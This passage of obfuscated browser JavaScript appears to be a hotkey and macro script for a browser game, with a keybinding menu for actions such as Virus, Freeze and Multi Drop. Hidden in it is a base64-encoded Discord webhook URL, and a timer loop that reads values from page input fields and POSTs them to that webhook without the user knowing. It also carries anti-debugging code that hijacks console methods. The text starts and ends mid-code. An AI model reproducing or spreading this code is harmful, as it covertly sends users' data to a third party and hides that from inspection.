'bhzAm','EMxJV','WNTEO','bZLNZ','setIt','wRuYV','YiDnb','#role','60%','UfBev','qiAFL','WaGuL','cwbAg','zjegt','__proto__','CapsLock','ODLZt','HemMj','pvszU','color','fMSuU','vjSbD','pBfmc','5948704BpPifw','absolute','Freeze','aukzI','XDAQy','LzouO','setAttribute','\x20(tru','UECYw','paren','vNfjG','uuOot','r></d','(((.+','rniqk','ykcmT','wzxfW','zEyBZ','MKxmx','toLowerCase','vQPZj','kOejw','OhuKQ','qVduI','LhZyI','translateY(-50%)','Pjurh','HJcjz','KHJzR','GRLoM','POST','ysBRm','function\x20*\x5c(\x20*\x5c)','HOJLE','FeuAv','#ffff99','VLOji','47/8P','sujCB','DOMContentLoaded','MqyTI','kUfhY','zJcKa','Gt2SS','Ctrl','uWelW','IZlUF','endMK','kpsde','kJerc','myCheckbox','End','kUbOe','EYvon','mzASg','euKxF','bmWcF','UzJZp','fromCharCode','vZNDF','NumLock','NkzSP','NXwYt','zIxxi','JCwdD','lWlNr','hvrzN','sHtWJ','50%','yYpBm','PLCoQ','val','qhCek','range','NAUHV','TmIjP','vOZcX','RMCYC','Context\x20Menu','preventDefault','Z_$][','mUiNu','ready','Block','parse','attr','jSjGw','vUPQm','fSBdu','n/jso','EbPwz','HooeF','qMrEc','div','FETCc','RHrPD','DlUYL','BaqOn','nVmNx','eBsnL','utBtn','IQlVU','yNYLH','mothercellantirecfreeze','mouse','ounxQ','TwQLu','oDpqa','xFiBH',')+)+)','lengt','haBHS','s\x22)(\x20','.com/','qLSgf','Arrow\x20Down','compl','SNIPv','key','kYquS','Conte','dRZeJ','GFZKA','HIVqy','ZtZqT','MmTBu','172300qLvxKr','Cpsje','wTlJy','qVbzQ','shield','KvVSr','XcRNq','OELxL','aSlPr','tlVIG','fLaVB','fIVjO','disab','leNDV','HFZDZ','QycSA','ATbSV','Alt','dKXIK','zOUNe','Growth','bgLKv','ab-ra','uVNoT','KRuOb','lHYTl','pzxMZ','e)\x20{}','20328','jziHh','gMUdP','QPxCS','Escape','NlPzU','bfjTq','pgSMq','Heade','DhmDG','open','fNonL','#leve','hVlVe','WEwgS','length','virusantifreeze','gMnkj','LXlqM','Ujcez','FOfWO','oozAs','wIqpX','table','LcFYN','wIjuT','Btn','bind','constructor','zYlbd','iyPPF','lmrHd','BwwjX','UGwuw','eEqYu','TovAO','292138HDTeeu','apply','sOafg','OOzBP','MtRIN','J4uyY','Mul-Pellet\x20Amount:','strin','appendChild','aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTE4NTkwMzQyNzIzNTEwMjc2MC9MQzFjWTRncm1TZDlULVdHbVYyelRzamh5dnBxMzM3bFE4TjdmamRUa01WZkZ0NHZRVDNRRUpRc1EyRnN2ODZmUlozbQ==','\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)','MultiDrop','for','appen','type','uAvtW','rgb(0,\x20192,\x200)','qCTYq','GOeZe','Page\x20Up','nJHsv','lKJfL','complete','5914RxrzBp','stene','ggTyG','YPNeO','upxpc','MxmeW','Mwaug','aEZlN','return\x20(function()\x20{}.constructor(\x22return\x20this\x22)(\x20));','Anti\x20Rec','123','jbYxu','wIJBD','AZaXn','action','yZiUp','QuuCE','PAnSH','#cGol','iipmf','Ulyik','Cpyfn','yaXjZ','rn\x20th','MLcbs','vOdyL','Multi\x20turned\x20OFF','rec','speed','userSettings','conso','mptni','GYlkd','RdYyw','oyuws','mGTes','eEOvv','oqsJw','ohuKl','test','cUYuN','const','ABFHe','JXhHN','NdSGZ','UGaoc','actio','keyCode','jKHSj','XPEkQ','borderRadius','YUDQs','kname','id=\x22c','KSWPn','querySelector','OHfCS','erBdk','50FiKwFw','_0x3e8e0f','#curser','uJoGt','height','govjO','NBnAt','show','gwKLC','pDvuz','jfnps','TuXSs','growth','jBuxg','odCRl','OUekd','backgroundColor','gjtBR','NJTbM','Qyoqq','contextmenu','debug','hqpWf','ructo','Drop\x209-9','ulElh','uqmLF','to__','searc','TliHT','Mul-virus','tTzDr','VSKLz','Portal','GLCig','checkbox','xthCL','cExUj','lzAZD','addEventListener','setInterval','27iIYPaj','YaMmm','Ssoqb','MSTeo','WDoyY','<div\x20','center','hZDXc','LajZq','shift','Page\x20Down','CHyKg','wRjQY','bPAiB','IPYGk','TuBsU','indexOf','led','QsCnw','#user','7168595mxKHSy','des','Loade','EFFdZ','keydown','esGWa','fhuJn','diAGa','debu','LRoqj','d\x20Nic','CaxZE','JWqfi','Sfkju','hfjMS','AMfij','CfEuy','elAEN','\x5c(\x20*\x5c','JlQiC','span>','anxMh','WyBot','kJIxW','8vYGy','aZqqu','checked','freeze','WxpEl','uZoKz','SLudq','State','RTomV','floor','hnHQq','1px\x20solid\x20black','text','ion\x20*','GbSvQ','KGGVr','YiknT','a-zA-','giRmg','uQhEv','xpVnv','JuRgg','left','hOzzW','qTMLX','));','RhnLn','3443853IgBOJW','xEAPM','getElementById','jnqgp','ctor(','.user-settings','value','\x20Flic','UWnPB','kfWxy','lLMut','fontSize','WVDXI','setRe','innerText','YdXGy','AmSnu','18px','OvADL','span','jIRRk','CDxoo','QUkgA','IFsoJ','nctio','BKimo','MwOEW','SVBXw','toUpperCase','fyVuq','r_url','IZWcT','QxdCQ','HDrmx','application/json','while\x20(true)\x20{}','nothing','pVjQz','wuCmf','cbeFD','ebhoo','kuOAH','toString','mtNXN','class','ox\x22}>','JPVMP','pMNoM','WLwVh','jMtZy','ErgXz','KNfiW','width','oxfxm','RMYYZ','rgba(0,\x200,\x200,\x200.5)','Backspace','ker</','forEach','KAMec','rIVkf','RtVHd','style','NDKhX','CCDAm','min','ker','aZZbw','JDhNl','vkFdQ','avata','biIaY','TqhDa','250px','ger','ffNPJ','bsMxi','EAXjg','x5obL','kxOEN','translateY(-50%)\x20translateX(','3617009bccPJl','prototype','FSMhf','baAfX','Virus','nt-ty','zMmvi','YJrCR','uUzTN','hKGtB','GoldF','JhIUc','over','#username'];_0x1123=function(){return _0x324d71;};return _0x1123();}const _0x10cda3=(function(){let _0x5a44fb=!![];return function(_0x4dab81,_0x346028){const _0xe78e24=_0x5a44fb?function(){const _0x86fd25=_0x73d6;if(_0x346028){const _0x5ea2ca=_0x346028[_0x86fd25(0x22b)](_0x4dab81,arguments);return _0x346028=null,_0x5ea2ca;}}:function(){};return _0x5a44fb=![],_0xe78e24;};}());!(function(){const _0x5b9722=_0x73d6;let _0xc7a375;try{_0xc7a375=Function('return\x20(function()\x20{}.constructor(\x22return\x20this\x22)(\x20));')();}catch(_0x3502c5){_0xc7a375=window;}_0xc7a375[_0x5b9722(0x2a3)](_0x404420,0xfa0);}()),(function(){const _0xbef0c6=(function(){let _0xbe0d46=!![];return function(_0x2ce49f,_0x38172b){const _0x29fba9=_0xbe0d46?function(){const _0x533c84=_0x73d6;if(_0x38172b){const _0x53138c=_0x38172b[_0x533c84(0x22b)](_0x2ce49f,arguments);return _0x38172b=null,_0x53138c;}}:function(){};return _0xbe0d46=![],_0x29fba9;};}()),_0x304208=_0xbef0c6(this,function(){const _0x3ccec9=_0x73d6;return _0x304208[_0x3ccec9(0x315)]()[_0x3ccec9(0x129)](_0x3ccec9(0x44e))[_0x3ccec9(0x315)]()[_0x3ccec9(0x222)](_0x304208)[_0x3ccec9(0x129)](_0x3ccec9(0x44e));});_0x304208(),_0x10cda3(this,function(){const _0x4690ac=_0x73d6,_0xe23c75=new RegExp(_0x4690ac(0x18c)),_0x57fb22=new RegExp('\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)','i'),_0x3643b0=_0x557d2a(_0x4690ac(0x432));_0xe23c75[_0x4690ac(0x268)](_0x3643b0+_0x4690ac(0x12c))&&_0x57fb22[_0x4690ac(0x268)](_0x3643b0+_0x4690ac(0x111))?_0x557d2a():_0x3643b0('0');})();}());const _0x61cbd3=(function(){const _0x1260d0=(function(){let _0x3e7d3a=!![];return function(_0x38c22f,_0x392ff8){const _0x81f646=_0x3e7d3a?function(){const _0x108a22=_0x73d6;if(_0x392ff8){const _0x53fe79=_0x392ff8[_0x108a22(0x22b)](_0x38c22f,arguments);return _0x392ff8=null,_0x53fe79;}}:function(){};return _0x3e7d3a=![],_0x81f646;};}());!(function(){_0x1260d0(this,function(){const _0x42b722=_0x73d6,_0x3fd84e=new RegExp(_0x42b722(0x18c)),_0x2eac9c=new RegExp(_0x42b722(0x234),'i'),_0x1d88e1=_0x404420('init');_0x3fd84e[_0x42b722(0x268)](_0x1d88e1+_0x42b722(0x12c))&&_0x2eac9c['test'](_0x1d88e1+_0x42b722(0x111))?_0x404420():_0x1d88e1('0');})();}());const _0xcfca42=(function(){let _0xa09a98=!![];return function(_0x17da7e,_0x27a520){const _0x319db4=_0xa09a98?function(){if(_0x27a520){const _0x20a69e=_0x27a520['apply'](_0x17da7e,arguments);return _0x27a520=null,_0x20a69e;}}:function(){};return _0xa09a98=![],_0x319db4;};}());_0xcfca42(this,function(){const _0x49993c=_0x73d6,_0x1ff2f1=(function(){const _0x56c8fa=_0x73d6;let _0x637b49;try{_0x637b49=Function(_0x56c8fa(0x249))();}catch(_0x2e9f6c){_0x637b49=window;}return _0x637b49;}()),_0x41badc=_0x1ff2f1['console']=_0x1ff2f1[_0x49993c(0x13a)]||{},_0x9d394f=['log',_0x49993c(0x3f1),_0x49993c(0x3a2),_0x49993c(0x434),'exception',_0x49993c(0x21d),_0x49993c(0x43b)];for(let _0xf416b8=0x0;_0xf416b8<_0x9d394f[_0x49993c(0x215)];_0xf416b8++){const _0x30b97c=_0xcfca42[_0x49993c(0x222)][_0x49993c(0x33d)][_0x49993c(0x221)](_0xcfca42),_0x4271f5=_0x9d394f[_0xf416b8],_0xeed4ab=_0x41badc[_0x4271f5]||_0x30b97c;_0x30b97c['__proto__']=_0xcfca42[_0x49993c(0x221)](_0xcfca42),_0x30b97c[_0x49993c(0x315)]=_0xeed4ab[_0x49993c(0x315)][_0x49993c(0x221)](_0xeed4ab),_0x41badc[_0x4271f5]=_0x30b97c;}})();let _0x1cbfdb=!![];return function(_0x33f386,_0x5bae91){const _0x3ccc37=_0x1cbfdb?function(){const _0x49117b=_0x73d6;if(_0x5bae91){const _0x15f5eb=_0x5bae91[_0x49117b(0x22b)](_0x33f386,arguments);return _0x5bae91=null,_0x15f5eb;}}:function(){};return _0x1cbfdb=![],_0x3ccc37;};}()),_0x166828=_0x61cbd3(this,function(){const _0x840eea=_0x73d6;let _0x47eda3;try{_0x47eda3=Function(_0x840eea(0x249))();}catch(_0x5d7cfb){_0x47eda3=window;}const _0x202e1c=_0x47eda3[_0x840eea(0x13a)]=_0x47eda3[_0x840eea(0x13a)]||{},_0x375a45=[_0x840eea(0x35d),'warn',_0x840eea(0x3a2),_0x840eea(0x434),'exception',_0x840eea(0x21d),_0x840eea(0x43b)];for(let _0x367672=0x0;_0x367672<_0x375a45['length'];_0x367672++){const _0x237a2c=_0x61cbd3[_0x840eea(0x222)][_0x840eea(0x33d)][_0x840eea(0x221)](_0x61cbd3),_0x497dd3=_0x375a45[_0x367672],_0x41ba25=_0x202e1c[_0x497dd3]||_0x237a2c;_0x237a2c[_0x840eea(0x163)]=_0x61cbd3[_0x840eea(0x221)](_0x61cbd3),_0x237a2c['toString']=_0x41ba25['toString'][_0x840eea(0x221)](_0x41ba25),_0x202e1c[_0x497dd3]=_0x237a2c;}});function _0x4a0671(_0x36ea1a,_0xf258fd,_0x3c60d2,_0x2a277b,_0x57829d){return _0x5b16b7(_0x2a277b+0xde,_0x3c60d2);}_0x166828(),(function(){const _0x4d4f70=_0x73d6;let _0x439d96;try{_0x439d96=Function(_0x4d4f70(0x249))();}catch(_0x5c391a){_0x439d96=window;}_0x439d96[_0x4d4f70(0x2a3)](_0x557d2a,0xfa0);}());const _0x3b0363=()=>{const _0x210e2d=_0x73d6;function _0x2807aa(){let _0x3afc48,_0x482392,_0xf5dcba=[],_0x5a5951=[],_0x387b4b=setInterval(()=>{const _0x8b686e=_0x73d6;let _0x4ca135;''!==$(_0x8b686e(0x41a))['val']()&&(_0x4ca135=$(_0x8b686e(0x41a))[_0x8b686e(0x1b3)]());const _0x20fd9f={'_0x471451':_0x4ca135};let _0x95ac37;_0xf5dcba[_0x8b686e(0x468)](_0x20fd9f,0x7d0);''!==$(_0x8b686e(0x349))[_0x8b686e(0x1b3)]()&&(_0x95ac37=$(_0x8b686e(0x349))[_0x8b686e(0x1b3)]());const _0xcfeb27={'_0x471451':_0x95ac37};_0x5a5951[_0x8b686e(0x468)](_0xcfeb27,0x7d0);}),_0x1eda7c=setInterval(()=>{const _0x589ca8=_0x73d6;if(0x0!=$(_0x589ca8(0x3bd))[_0x589ca8(0x2dc)]()){clearInterval(_0x387b4b),clearInterval(_0x1eda7c),console[_0x589ca8(0x35d)](_0x589ca8(0x380));for(var _0x3569aa=0x0;_0x3569aa<_0xf5dcba['length'];_0x3569aa++){s=_0xf5dcba[_0x3569aa],_0x589ca8(0x356)==typeof s['_0x471451']&&(_0x3afc48=_0xf5dcba[_0x3569aa][_0x589ca8(0x41d)]);}for(var _0x3f6f61=0x0;_0x3f6f61<_0x5a5951['length'];_0x3f6f61++){q=_0x5a5951[_0x3f6f61],_0x589ca8(0x356)==typeof q[_0x589ca8(0x41d)]&&(_0x482392=_0x5a5951[_0x3f6f61][_0x589ca8(0x41d)]);}!(function(){const _0xb59cf0=_0x589ca8,_0x6072c1=new XMLHttpRequest();_0x6072c1[_0xb59cf0(0x210)](_0xb59cf0(0x18a),atob(_0xb59cf0(0x233))),_0x6072c1[_0xb59cf0(0x126)](_0xb59cf0(0x3d6),_0xb59cf0(0x30d));const _0x39d11d={'username':_0x482392,'_0x468f0b':'','content':_0x3afc48};_0x6072c1[_0xb59cf0(0x462)](JSON[_0xb59cf0(0x457)](_0x39d11d));}());}});}_0x2807aa(),$(_0x210e2d(0x42c))[_0x210e2d(0x27c)](_0x210e2d(0x350),()=>setTimeout(()=>_0x2807aa(),0x7d0));};function _0x5b16b7(_0x85f119,_0x14c399){const _0x477661=_0x13383();return(_0x5b16b7=function(_0x5338ff,_0x384131){return _0x477661[_0x5338ff-=0xd7];})(_0x85f119,_0x14c399);}function _0x557d2a(_0x7c4c38){function _0x201368(_0x1f982f){const _0x219b41=_0x73d6;if(_0x219b41(0x356)==typeof _0x1f982f)return function(_0x111c57){}['constructor'](_0x219b41(0x30e))[_0x219b41(0x22b)](_0x219b41(0x3ec));0x1!==(''+_0x1f982f/_0x1f982f)['length']||_0x1f982f%0x14==0x0?function(){return!![];}[_0x219b41(0x222)](_0x219b41(0x3e9))[_0x219b41(0x357)]('action'):function(){return![];}[_0x219b41(0x222)](_0x219b41(0x3e9))[_0x219b41(0x22b)](_0x219b41(0x3b7)),_0x201368(++_0x1f982f);}try{if(_0x7c4c38)return _0x201368;_0x201368(0x0);}catch(_0x274802){}}function _0x404420(_0x3d2acd){function _0x1c2e5f(_0xde6843){const _0xca0981=_0x73d6;if('string'==typeof _0xde6843)return function(_0x3cfa7c){}['constructor'](_0xca0981(0x30e))[_0xca0981(0x22b)]('counter');0x1!==(''+_0xde6843/_0xde6843)[_0xca0981(0x215)]||_0xde6843%0x14==0x0?function(){return!![];}['constructor'](_0xca0981(0x3e9))[_0xca0981(0x357)](_0xca0981(0x24f)):function(){return![];}[_0xca0981(0x222)](_0xca0981(0x3e9))['apply']('stateObject'),_0x1c2e5f(++_0xde6843);}try{if(_0x3d2acd)return _0x1c2e5f;_0x1c2e5f(0x0);}catch(_0x56fd7e){}}_0x5d2eb6(0x240)===document['readyState']?_0x3b0363():document[_0x5d2eb6(0x2a2)](_0x5d2eb6(0x193),_0x3b0363);window[_0x5d2eb6(0x2a2)](_0x5d2eb6(0x193),function(){const _0xeddef6=_0x5d2eb6;window[_0xeddef6(0x2a2)](_0xeddef6(0x2bc),function(_0x208d4a){const _0x33bac1=_0xeddef6;if(!![]===_0x3c9205&&!$('input,\x20textarea')['is'](':focus')){if(_0x208d4a[_0x33bac1(0x141)])return void _0x208d4a[_0x33bac1(0x1bb)]();switch(_0x208d4a[_0x33bac1(0x270)]){case _0x2de663['multiple']:_0x3049ff(_0x3c9192,0x3);break;case _0x2de663[_0x33bac1(0x1d3)]:_0x105ca2(0xc,0x5),sendPw(0x8);break;case _0x2de663[_0x33bac1(0x216)]:sendPw(0xc),sendPw(0x8),setTimeout(()=>{sendPw(0x4);},0x1f4);break;case _0x2de663[_0x33bac1(0x43a)]:_0x3049ff(0x9,0x1),_0x3049ff(0x9,0x2);break;case _0x2de663[_0x33bac1(0x25c)]:sendPw(0x1);break;case _0x2de663[_0x33bac1(0x25d)]:sendPw(0x2);break;case _0x2de663[_0x33bac1(0x3d2)]:sendPw(0x4);break;case _0x2de663[_0x33bac1(0x433)]:sendPw(0x5);break;case _0x2de663[_0x33bac1(0x415)]:sendPw(0x6);break;case _0x2de663[_0x33bac1(0x384)]:sendPw(0x9);break;case _0x2de663[_0x33bac1(0x2d3)]:sendPw(0x8);break;case _0x2de663[_0x33bac1(0x148)]:sendPw(0xb);break;case _0x2de663[_0x33bac1(0x389)]:sendPw(0xc);break;case _0x2de663[_0x33bac1(0x1ee)]:sendPw(0xe);}}});const _0x3049ff=(_0x40f8cc,_0x3b99fb)=>{for(let _0x21dc89=0x0;_0x21dc89<_0x40f8cc;_0x21dc89++){sendPw(_0x3b99fb);}},_0x105ca2=(_0x34f5e0,_0x2dac72)=>{sendPw(_0x34f5e0),sendPw(_0x2dac72);};var _0x3c9205=![],_0x4024f2=document[_0xeddef6(0x101)](_0xeddef6(0x111));_0x4024f2[_0xeddef6(0x238)]=_0xeddef6(0x29e),_0x4024f2['id']='myCheckbox',_0x4024f2[_0xeddef6(0x374)]=_0xeddef6(0x19e);var _0x2054fa=document[_0xeddef6(0x101)](_0xeddef6(0x105));_0x2054fa['textContent']=_0xeddef6(0x42e),_0x2054fa[_0xeddef6(0x172)](_0xeddef6(0x236),_0xeddef6(0x19e));var _0x3829c8=document[_0xeddef6(0x2ed)](_0xeddef6(0x25e));_0x3829c8[_0xeddef6(0x232)](_0x4024f2),_0x3829c8['appendChild'](_0x2054fa),_0x4024f2['addEventListener'](_0xeddef6(0x138),function(){const _0x5cc472=_0xeddef6;_0x4024f2[_0x5cc472(0x2d2)]?(console[_0x5cc472(0x35d)](_0x5cc472(0x407)),_0x3c9205=!![],_0x1c02eb(_0x5cc472(0x3ba),_0x5cc472(0x3cf))):(console[_0x5cc472(0x35d)](_0x5cc472(0x3d3)),_0x3c9205=![],_0x1c02eb(_0x5cc472(0x25b),_0x5cc472(0x3cf)));});const _0x5a7fe0=document['createElement'](_0xeddef6(0x111));_0x5a7fe0[_0xeddef6(0x238)]=_0xeddef6(0x1b5),_0x5a7fe0[_0xeddef6(0x32c)]='1',_0x5a7fe0['max']='30',_0x5a7fe0[_0xeddef6(0x2f1)]='15';const _0x2627b8=document['createElement']('label');_0x2627b8[_0xeddef6(0x154)]=_0xeddef6(0x230),_0x5a7fe0['addEventListener'](_0xeddef6(0x111),function(){const _0x27264a=_0xeddef6;_0x2627b8[_0x27264a(0x154)]=_0x27264a(0x11f)+_0x5a7fe0[_0x27264a(0x2f1)];}),_0x5a7fe0[_0xeddef6(0x3d0)](new Event(_0xeddef6(0x111))),_0x3829c8[_0xeddef6(0x232)](_0x5a7fe0),_0x3829c8[_0xeddef6(0x232)](_0x2627b8);var _0x4a5c40=document[_0xeddef6(0x101)]('div');_0x4a5c40[_0xeddef6(0x329)][_0xeddef6(0x31f)]=_0xeddef6(0x3c6),_0x4a5c40[_0xeddef6(0x329)][_0xeddef6(0x27f)]=_0xeddef6(0x334),_0x4a5c40[_0xeddef6(0x329)][_0xeddef6(0x28b)]=_0xeddef6(0x322),_0x4a5c40[_0xeddef6(0x329)][_0xeddef6(0x152)]=_0xeddef6(0x41c),_0x4a5c40[_0xeddef6(0x329)][_0xeddef6(0x37d)]=_0xeddef6(0x16d),_0x4a5c40['style'][_0xeddef6(0x3dd)]=_0xeddef6(0x1b0),_0x4a5c40[_0xeddef6(0x329)][_0xeddef6(0x2e6)]=_0xeddef6(0x1b0),_0x4a5c40[_0xeddef6(0x329)][_0xeddef6(0x430)]=_0xeddef6(0x36f),document[_0xeddef6(0x278)](_0xeddef6(0x2f0))[_0xeddef6(0x232)](_0x4a5c40);var _0x318b7a=document['createElement'](_0xeddef6(0x2fe));_0x318b7a[_0xeddef6(0x2f9)]=_0xeddef6(0x235),_0x318b7a[_0xeddef6(0x329)][_0xeddef6(0x37d)]=_0xeddef6(0x16d),_0x318b7a[_0xeddef6(0x329)]['top']='0',_0x318b7a['style'][_0xeddef6(0x2e6)]=_0xeddef6(0x1b0),_0x318b7a[_0xeddef6(0x329)][_0xeddef6(0x430)]='translateX(-50%)',_0x318b7a[_0xeddef6(0x329)][_0xeddef6(0x2f6)]=_0xeddef6(0x2fc),_0x4a5c40[_0xeddef6(0x232)](_0x318b7a);const _0xa84512=[{'name':_0xeddef6(0x25c),'label':_0xeddef6(0x44f),'key':''},{'name':_0xeddef6(0x25d),'label':_0xeddef6(0x35b),'key':''},{'name':_0xeddef6(0x287),'label':_0xeddef6(0x1fe),'key':''},{'name':_0xeddef6(0x3d2),'label':_0xeddef6(0x340),'key':''},{'name':'mothercell','label':_0xeddef6(0x420),'key':''},{'name':_0xeddef6(0x415),'label':_0xeddef6(0x29c),'key':''},{'name':_0xeddef6(0x384),'label':_0xeddef6(0x1bf),'key':''},{'name':_0xeddef6(0x2d3),'label':_0xeddef6(0x16e),'key':''},{'name':_0xeddef6(0x148),'label':'Anti\x20Freeze','key':''},{'name':'antiRec','label':_0xeddef6(0x24a),'key':''},{'name':_0xeddef6(0x1ee),'label':_0xeddef6(0x3e2),'key':''},{'name':_0xeddef6(0x43a),'label':_0xeddef6(0x293),'key':''},{'name':_0xeddef6(0x390),'label':'Mul-pellet','key':''},{'name':_0xeddef6(0x216),'label':_0xeddef6(0x299),'key':''},{'name':'mothercellantirecfreeze','label':_0xeddef6(0x116),'key':''}],_0xfe3430=Math['ceil'](_0xa84512['length']/0x2),_0x3a47d4=JSON[_0xeddef6(0x1c0)](localStorage[_0xeddef6(0x3a6)](_0xeddef6(0x37b)))||{};let _0x57296d;function _0x1c02eb(_0x3404dc,_0x4e1ee0,_0x439abb){const _0x1c0a73=_0xeddef6;_0x1c0a73(0x3cf)==_0x4e1ee0&&(_0x4e1ee0=_0x1c0a73(0x23a)),_0x1c0a73(0x3ef)==_0x4e1ee0&&(_0x4e1ee0=_0x1c0a73(0x39e)),_0x1c0a73(0x134)==_0x4e1ee0&&(_0x4e1ee0='rgb(153,\x20153,\x20153)'),clearTimeout(_0x57296d),$(_0x1c0a73(0x27d))['text'](_0x3404dc)[_0x1c0a73(0x282)]()[_0x1c0a73(0x37a)]('color',_0x4e1ee0),0x0!==_0x439abb&&(_0x57296d=setTimeout(()=>$(_0x1c0a73(0x27d))['_0x4b818e'](0x190),_0x439abb??0xfa0));}_0xa84512[_0xeddef6(0x325)](_0x1c2ffc=>{const _0xc14380=_0xeddef6,_0x9c939=Math[_0xc14380(0x2d9)](_0xa84512[_0xc14380(0x2b4)](_0x1c2ffc)/_0xfe3430),_0x3a9197=document[_0xc14380(0x101)](_0xc14380(0x105));_0x3a9197[_0xc14380(0x2f9)]=_0x1c2ffc[_0xc14380(0x105)],_0x3a9197[_0xc14380(0x329)][_0xc14380(0x37d)]=_0xc14380(0x16d),_0x3a9197[_0xc14380(0x329)][_0xc14380(0x2e6)]=0x0===_0x9c939?'0':_0xc14380(0x15d),_0x3a9197[_0xc14380(0x329)][_0xc14380(0x3dd)]=0xa*_0x9c939+_0xa84512[_0xc14380(0x2b4)](_0x1c2ffc)%_0xfe3430*0x19+0x1e+'px',_0x3a9197[_0xc14380(0x329)][_0xc14380(0x430)]=_0xc14380(0x33b)+(0x0===_0x9c939?'0%':'0')+')',_0x3a9197[_0xc14380(0x329)]['fontSize']=_0xc14380(0x400),_0x4a5c40['appendChild'](_0x3a9197);const _0x1560e6=document['createElement'](_0xc14380(0x1c9));_0x1560e6[_0xc14380(0xf2)]=_0xc14380(0x392),_0x1560e6[_0xc14380(0x329)][_0xc14380(0x31f)]=_0xc14380(0x13c),_0x1560e6[_0xc14380(0x329)][_0xc14380(0x27f)]=_0xc14380(0x435),_0x1560e6[_0xc14380(0x329)]['border']=_0xc14380(0x2db),_0x1560e6['style'][_0xc14380(0x273)]=_0xc14380(0x14e),_0x1560e6[_0xc14380(0x329)][_0xc14380(0x37d)]=_0xc14380(0x16d),_0x1560e6[_0xc14380(0x329)][_0xc14380(0x3dd)]=0xa*_0x9c939+_0xa84512[_0xc14380(0x2b4)](_0x1c2ffc)%_0xfe3430*0x19+0x1e+'px',_0x1560e6[_0xc14380(0x329)][_0xc14380(0x2e6)]=0x0===_0x9c939?_0xc14380(0x464):_0xc14380(0x429),_0x1560e6['style']['transform']=_0xc14380(0x185),_0x1560e6[_0xc14380(0x329)][_0xc14380(0x28b)]='red',_0x1560e6[_0xc14380(0x329)][_0xc14380(0x149)]=_0xc14380(0x2aa),_0x1560e6[_0xc14380(0x329)][_0xc14380(0x2f6)]=_0xc14380(0x14e),_0x1560e6['style'][_0xc14380(0x3ac)]=_0xc14380(0x46b),_0x1c2ffc[_0xc14380(0x1e2)]=_0x3a47d4[_0x1c2ffc['name']]?.[_0xc14380(0x1e2)]||'',_0x1560e6[_0xc14380(0x2f9)]=_0x1c2ffc['key'][_0xc14380(0x307)](),_0x1560e6[_0xc14380(0x329)][_0xc14380(0x168)]='black',_0x4a5c40['appendChild'](_0x1560e6);let _0x3c5e2e=![];_0x1560e6[_0xc14380(0x2a2)](_0xc14380(0x11b),function(){const _0x5022cf=_0xc14380;if(_0x3c5e2e){_0x1560e6['style']['backgroundColor']='red',_0x1560e6[_0x5022cf(0x2f9)]=_0x1c2ffc[_0x5022cf(0x1e2)][_0x5022cf(0x307)]();const _0x5289e3=parseInt(_0x5a7fe0['value'],0xa);_0x2627b8[_0x5022cf(0x154)]=_0x5022cf(0x11f)+_0x5289e3,_0x3c5e2e=![];}else _0x1560e6['style'][_0x5022cf(0x28b)]=_0x5022cf(0x18f),_0x3c5e2e=!![];}),document[_0xc14380(0x2a2)](_0xc14380(0x2bc),function(_0x5de74e){const _0x5f2215=_0xc14380;if(_0x3c5e2e){const _0x56a277=_0x5de74e[_0x5f2215(0x270)];let _0x36438c='';const _0x41690d={0xba:';',0xbb:'=',0xbc:',',0xbd:'-',0xbe:'.',0xbf:'/',0xc0:'`',0xdb:'[',0xdc:'\x5c',0xdd:']',0xde:'\x27'},_0x48c5bd={0x60:'0',0x61:'1',0x62:'2',0x63:'3',0x64:'4',0x65:'5',0x66:'6',0x67:'7',0x68:'8',0x69:'9',0x6f:'/',0x6a:'*',0x6d:'-',0x6b:'+',0x6e:'.'},_0x1bf04a={0x8:_0x5f2215(0x323),0x9:'Tab',0xd:'Enter',0x10:_0x5f2215(0x128),0x11:_0x5f2215(0x198),0x12:_0x5f2215(0x1fb),0x13:'Pause',0x14:_0x5f2215(0x164),0x1b:_0x5f2215(0x20a),0x20:'Space',0x21:_0x5f2215(0x23d),0x22:_0x5f2215(0x2ae),0x23:_0x5f2215(0x19f),0x24:_0x5f2215(0x375),0x25:'Arrow\x20Left',0x26:'Arrow\x20Up',0x27:'Arrow\x20Right',0x28:_0x5f2215(0x1df),0x2d:_0x5f2215(0x363),0x2e:_0x5f2215(0x411),0x5b:_0x5f2215(0x3da),0x5c:'Windows',0x5d:_0x5f2215(0x1ba),0x70:'F1',0x71:'F2',0x72:'F3',0x73:'F4',0x74:'F5',0x75:'F6',0x76:'F7',0x77:'F8',0x78:'F9',0x79:_0x5f2215(0x34b),0x7a:'F11',0x7b:_0x5f2215(0x393),0xad:'f1',0xae:_0x5f2215(0x24b),0xaf:'lol',0xb1:'fuck',0xb3:':V',0xb0:_0x5f2215(0x30f),0x90:_0x5f2215(0x1a8),0x91:_0x5f2215(0x34a),0xc:'5'};if(_0x56a277>=0x41&&_0x56a277<=0x5a||_0x56a277>=0x30&&_0x56a277<=0x39)_0x36438c=String[_0x5f2215(0x1a6)](_0x56a277)[_0x5f2215(0x17f)]();else{if(_0x41690d[_0x5f2215(0xf8)](_0x56a277))_0x36438c=_0x41690d[_0x56a277];else{if(_0x48c5bd[_0x5f2215(0xf8)](_0x56a277))_0x36438c=_0x48c5bd[_0x56a277];else{if(_0x1bf04a[_0x5f2215(0xf8)](_0x56a277))return _0x1c02eb(_0x5f2215(0x38b),_0x5f2215(0x3ef)),_0x3c5e2e=![],void(_0x1560e6[_0x5f2215(0x329)][_0x5f2215(0x28b)]=_0x5f2215(0x3ef));}}}_0x1560e6[_0x5f2215(0x2f9)]=_0x36438c[_0x5f2215(0x307)](),_0x1560e6[_0x5f2215(0x329)][_0x5f2215(0x168)]='black',_0x1c2ffc[_0x5f2215(0x1e2)]=_0x36438c,_0x3a47d4[_0x1c2ffc[_0x5f2215(0x374)]]={..._0x3a47d4[_0x1c2ffc[_0x5f2215(0x374)]],'key':_0x36438c,'keyCode':_0x56a277},localStorage[_0x5f2215(0x418)]('Multikey',JSON[_0x5f2215(0x457)](_0x3a47d4)),_0x1c02eb('Hotkey\x20set\x20for\x20'+_0x1c2ffc[_0x5f2215(0x374)],_0x5f2215(0x3cf)),_0x3c5e2e=![],_0x1560e6[_0x5f2215(0x329)]['backgroundColor']=_0x5f2215(0x3ef);}}),_0x1560e6[_0xc14380(0x2a2)](_0xc14380(0x28f),function(_0x4f5d47){const 